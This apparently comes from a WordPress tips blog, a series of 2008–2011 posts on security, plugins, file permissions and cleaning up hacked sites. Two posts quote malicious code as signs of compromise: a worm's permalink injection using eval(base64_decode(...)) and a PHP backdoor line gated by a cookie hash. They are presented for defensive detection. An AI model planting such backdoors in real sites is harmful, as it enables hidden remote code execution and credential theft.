Customize Acceptable Upload File Types

February 21, 2011 | No Comments Yet

WordPress Garage points out that there’s a limited list of allowed file types that you can upload via the WP admin. For certain custom sites, since WordPress is being used for everything these days, that may need to be modified and Chris Meller shows us how.

As of WordPress 2.2, there are 35 allowed file types configured in the default install. While there’s no admin-based tool for editing this list (nor any plugins that I’m aware of), it’s not at all difficult to add your own…

The idea is to add a custom function inside your theme’s functions.php to be used as a filter. In that function you can then add specific file extensions and their corresponding mime types. On the other hand, to remove a file type that’s allowed by default, use the function unset().

Sounds simple and painless! Of course, keep in mind that limitations are put in place to keep WordPress secure, so tread carefully. Also, for reference, there’s a list of the accepted filetypes at the WordPress.com Support section, but that may vary on a self-hosted install.

Leave a Comment | Tags: , , , , , , , , ,

Check your web host file permissions first!

November 23, 2010 | No Comments Yet

WordPress security issues come and go, and while some stay because it’s tough to get the crud out, other times it’s because site owners overlook an important part of keeping their hosts protected: file permissions.

A properly configured web server will not allow users to access the files of another user, regardless of file permissions. The web server is the responsibility of the hosting provider. The methods for doing this (suexec, et al) have been around for 5+ years.

Matt Mullenweg warns against web hosts and other security announcements that place the blame on the WordPress software without first checking if proper file permissions are in place.

Devlounge has an old but still applicable article on protecting your wp-config.php files, for starters. This article on WP Tavern also tackles the issue above and shares more file permission advice especially on shared hosting accounts.

Leave a Comment | Tags: , , , , , , , , , ,

Tips on keeping your WordPress blog secure

July 22, 2010 | No Comments Yet

Make Tech Easier shares 11 tips on keeping malicious parties from penetrating your WordPress-powered blog. Here’s a snippet:

7) Change your login name

The default username is admin. You can make it more difficult for the hacker to crack your login credential by changing the login name.

You can never be too careful about these things, so be sure to follow the tips mentioned in the article.

(Via)

Leave a Comment | Tags: , , , ,

Read & blog on WordPress.com from your iPhone via Twitter

December 31, 2009 | No Comments Yet

Here’s an odd but fascinating hack discovered by Team 55 at the WP Quebec meetup: using the Twitter API, you can read and publish posts on WordPress.com from your iPhone! Matt Mullenweg explains step by step in this article. Pretty much any third-party Twitter client is okay; the key is to change the API URL to twitter-api.wordpress.com and then you can log in using your WordPress.com account.

Instead of following users you will follow blogs. Refer to them by their domain names (e.g. matt.wordpress.com). Support for replies and retweets will be added soon.

When you post a status update using our Twitter API, the update will appear on your blog. (If you have more than one blog you can choose which one gets the updates. The option is in your profile.)

Read more about this here. Matt also announced that they plan to release a WordPress MU plugin for this, so stay tuned for that one.

Leave a Comment | Tags: , , , , , , , , ,

Update and secure your WordPress installation

September 7, 2009 | No Comments Yet

There’s a worm circling the WordPress community and it’s attacking all sites that have not been updated to version 2.8.4. Lorelle reported its symptoms:

  1. “There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.””
  2. “The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.”

This certainly sounds familiar. Matt explains further:

Right now there is a worm making its way around old, unpatched versions of WordPress. This particular worm, like many before it, is clever: it registers a user, uses a security bug (fixed earlier in the year) to allow evaluated code to be executed through the permalink structure, makes itself an admin, then uses JavaScript to hide itself when you look at users page, attempts to clean up after itself, then goes quiet so you never notice while it inserts hidden spam and malware into your old posts.

The tactics are new, but the strategy is not. Where this particular worm messes up is in the “clean up” phase: it doesn’t hide itself well and the blogger notices that all his links are broken, which causes him to dig deeper and notice the extent of the damage. Where worms of old would do childish things like defacing your site, the new ones are silent and invisible, so you only notice them when they screw up (as this one did) or your site gets removed from Google for having spam and malware on it.

It must be stressed that upgrading is a preventive measure; if you’ve been attacked, you’ll need to go through your files and databases to get rid of the offending code.

A stitch in time saves nine. Upgrading is a known quantity of work, and one that the WordPress community has tried its darndest to make as easy as possible with one-click upgrades. Fixing a hacked blog, on the other hand, is quite hard. Upgrading is taking your vitamins; fixing a hack is open heart surgery. (This is true of cost, as well.)

Leave a Comment | Tags: , , , , ,

WordPress Plugin: Injection Attack Protector

July 1, 2009 | No Comments Yet

There are a lot of types of security breaches that threaten your WordPress blog, and spam/malware injection seems to be the most popular of the lot. Fortunately there’s a plugin that helps prevent that called the Injection Attack Protector. This script allows to you to scan your site for possible injection attacks and even a heal tool for the compromised files.

Make sure to follow the given instructions for the plugin to work properly. You’ll need to know how to create a password-protected folder on your site and edit certain files thru a text editor.

Download Injection Attack Protector

Leave a Comment | Tags: , , , , ,

Protect your WordPress blog with these plugins

June 17, 2009 | No Comments Yet

With WordPress 2.8 out, that means it’s upgrade season for us. That also means older, unupdated versions of WP more vulnerable to attacks. Keith Dsouza of Weblog Tools Collection has a list of recommended anti-spam and antivirus plugins to help improve security on your blog:

Anti-spam WordPress Plugins

  1. Akismet
  2. WP-SpamFree Anti-Spam
  3. WP-Hashcash
  4. WP reCAPTCHA
  5. Math Comment Spam Protection

Security WordPress Plugins

  1. WP Security Scan
  2. WordPress Exploit Scanner
  3. AskApache Password Protect
  4. TTC WordPress Security Tool
  5. Secure WordPress
  6. WordPress Firewall

Check out the blog post for details and download links to each of the plugins listed above. Got any more plugins you can recommend? You can never have enough!

Leave a Comment | Tags: , , , , ,

Errors and blank screens on your WordPress blog? You could have been hacked

April 8, 2009 | No Comments Yet

An important security issue for sites running WordPress: if you get this error “Parse error: syntax error, unexpected T_VARIABLE” or blank screens on your blog, there’s a very good change that you may have been hacked.

Design and Promote has a detailed list of bringing back your site into pristine condition, but if you can’t do that on your own, you can pay them $100.00 for the service. Either way, the first and most important step is finding out if your site has been compromised.

Leave a Comment | Tags: , , , ,

10 WordPress hacks

January 15, 2009 | No Comments Yet

Take your blog to the next level with this list of neat WordPress hacks, compiled by no less than Smashing Magazine and written by Jean-Baptiste Jung. Here’s what to expect:

  1. Display AdSense Ads to Search Engines Visitors Only
  2. Avoid Duplicate Posts in Multiple Loops
  3. Replacing “Next” and “Previous” Page Links with Pagination
  4. Automatically Get Images on Post Content
  5. Using Normal Quotes Instead of Curly Quotes
  6. Deny Comment Posting to No Referrer Requests
  7. Using CSS Sliding Doors in WordPress Navigaton
  8. Display a Random Header Image on Your WordPress Blog
  9. List Your Scheduled Posts

Each tip may seem difficult at first, but all you have to do is follow the instructions and you’ll be good to go. Perfect for beginner and advanced WordPress lovers!

Leave a Comment | Tags: , , ,

How to secure your WordPress installation

November 13, 2008 | 1 Comment

MyTestBox.com shares several important tips to keep your WordPress install secure. Here’s a summary:

  • Your “plugins” directory is NOT secured by default!
  • Choose a strong password!
  • Rename the administrative account!
  • Backup your database!
  • Log all your $POST variables!
  • Plugins that need write access!
  • Encrypt all communication within “wp-admin” directory! (if possible)
  • Tighten up the file permissions!
  • Of course, update your WordPress!

The last one is the simplest and easiest to follow, especially with the release of WP 2.7. You should at least make sure that you upgrade to the latest version of WordPress.

The blog post also contains links to other articles on hardening WordPress and dealing with hackers, so read it now!

Leave a Comment | Tags: , , ,

WordPress Plugin: WordPress Exploit Scanner

June 27, 2008 | No Comments Yet

With all the talk about WordPress security vulnerabilities, every bit of protection helps. The WordPress Exploit Scanner plugin does just what it says: it looks for any suspicious behavior in your WordPress files and database tables.

This WordPress plugin searches the files on your site for a few known strings sometimes used by hackers, and lists them with code fragments taken from the files. It also makes a few checks of the database, looking at the active_plugins blog option, the comments table, and the posts table.

It also allows the blog owner to search for whatever string they like which could come in handy when new exploit code is used in a hack.

Download WordPress Exploit Scanner

Leave a Comment | Tags: , , , , , , ,

More WordPress blogs being hacked

June 18, 2008 | No Comments Yet

Last time, it was a WordPress vulnerability that was resolved by upgrading to the latest version. This time, it’s a non-WordPress issue, specifically a redirect technique, that’s affecting a lot of WordPress-powered blogs.

The recent security issues concern hackers who work with Google and other search engine results and redirects traffic from your blog or website. The searchers clicks on the link and is redirected to the hacker’s site with the same search string used to search in the search engine. Most bloggers notice a problem when their site traffic drops inexplicably and/or their ad income drops.

Read Lorelle’s post for more information on detecting and eliminating this security issue.

Leave a Comment | Tags: , , , , , ,

Has Your WordPress Been Hacked Recently?

April 16, 2008 | 34 Comments

Matt Mullenweg’s recent post about a “bogus” WordPress security breach had me wondering about my own WordPress sites. Unfortunately, it turns out I’ve become a victim of a WordPress vulnerability whose symptoms are detailed here. Took me two whole nights of restoring my files and folders to their pristine condition. (Fingers crossed.) Take note that this is different from the ro8kfbsmag.txt hack, and seems to be a fairly recent attack. Thankfully, there are a lot of tell-tale signs:

Extra code added to the first line of PHP files

<?php if(md5($_COOKIE['_wp_debugger'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){ eval(base64_decode($_POST['file'])); exit; } ?>

Note that the letters numbers and numbers vary.

Solution: open the infected file and delete that code. I recommend using an FTP client like FileZilla, which when coupled with a text editor lets you edit a file then reflect thse changes on the server very quickly.

New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories

See if there are any files in writable directories that have the same named as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake “404 Not Found” error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on.

Solution: delete the files.

New files named wp-info.txt which contain database usernames and passwords

This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

Solution: delete the file and change all your passwords! Aside from your own, your visitors’ emails and passwords are also there, and somebody else is exploiting that information already.

New “WordPress” user in database (hidden in the admin panel users page)

One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.

Solution: delete the user. You need to access your database through phpMyAdmin or something similar.

WordPress version changed to 2.5

I’m logged into a site I know is still running 2.1.3, but the footer in the admin panels say 2.5 now.

Solution: upgrade to WordPress 2.5. Keeping your installation up-to-date eliminates old vulnerabilities.

More signs

The file creation and modification seemed to take place on April 11. For me it was the 12th. That’s surprisingly recent.

Also, you might get a lot of suspicious error messages in your logs, dating as far back as last year.

More Solutions

When it comes to security, there are a lot of possible culprits but in this particular situation, we can only be thankful there are a lot of indicative factors and fairly easy ways to resolve the problem. I cannot emphasize how important it is to upgrade immediately. Is it better to have non-working themes and plugins than an insecure site? I would think not.

However, one has to wonder how upgrading to WordPress 2.5 can fix the problem. Remember that when upgrading you are advised to delete the old files first then upload the new files. If you just upload and overwrite the old files, the new files such as the _new, _old, .pngg, .jpgg, .giff ones will remain on the server. Removing them one by one by going through each folder on your website will definitely be painful!

Also take a look at your file and folder permissions. We usually have to CHMOD our uploads, themes, and plugins folders so that we can edit them in the administration panel, but they also make for a hacker’s point of entry.

I believe the most crucial problem here are the wp-info.txt files. The other penetrations could have been used for adding spam comments and links only, but having access to people’s passwords is far worse, especially when it includes your own readers.

Update (April 17): There’s now a WordPress Codex page for this issue.

Update (May 2): Please continue to visit the WordPress Support forum for any new developments on this hack. There are other symptoms popping up, like unwanted plugins activated in the database (see active_plugins and deactivated_plugins under wp_options).

Update (June 10): Check out this very helpful post by Donncha O Caoimh.

Leave a Comment | Tags: , , , , , , ,